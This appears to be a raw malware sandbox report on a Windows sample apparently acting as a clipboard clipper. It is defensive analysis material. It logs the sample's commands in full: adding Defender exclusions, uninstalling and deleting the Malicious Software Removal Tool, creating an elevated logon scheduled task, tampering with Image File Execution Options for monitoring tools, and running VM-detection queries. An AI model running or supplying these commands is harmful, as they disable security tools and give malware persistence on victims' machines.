Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: classification engine Classification label: mal100.evad.winEXE@27/6@0/0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DD0ED0 CoCreateInstance,SysFreeString,CoSetProxyBlanket,GetErrorInfo,GetErrorInfo,SysFreeString,GetErrorInfo, 24_2_00007FF6D9DD0ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe File created: C:\Users\Public\Pictures_Old
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:304:WilStaging_02
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Mutant created: \Sessions\1\BaseNamedObjects\HgSyVtdfIS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urbrehpo.yuf.ps1
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: perfos.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: powrprof.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: secur32.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: netapi32.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: pdh.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: propsys.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: netutils.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: samcli.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: umpdc.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: edgegdi.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: apphelp.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: powrprof.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: pdh.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: propsys.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: edgegdi.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: umpdc.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: wbemcomn.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: amsi.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: userenv.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: profapi.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: perfos.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static file information: File size 30441984 > 1048576
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1cad000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: section name: .voltbl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: section name: _RDATA
Source: SppExtComObj.exe.5.dr Static PE information: section name: .voltbl
Source: SppExtComObj.exe.5.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848E7D2A5 pushad ; iretd 12_2_00007FF848E7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9380D pushad ; iretd 12_2_00007FF848F93811
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9846B push ebx; ret 12_2_00007FF848F9856A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9248D push E95B6C93h; ret 12_2_00007FF848F92539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F900BD pushad ; iretd 12_2_00007FF848F900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F924ED push E95B6C93h; ret 12_2_00007FF848F92539
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe File created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe

Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytes Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9901
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272 Thread sleep count: 9901 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1655713768.00000245B0E99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gment offers made9606Retrieval: Average branch rate9608Discovery: Successful discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes?
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor0&
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipesL
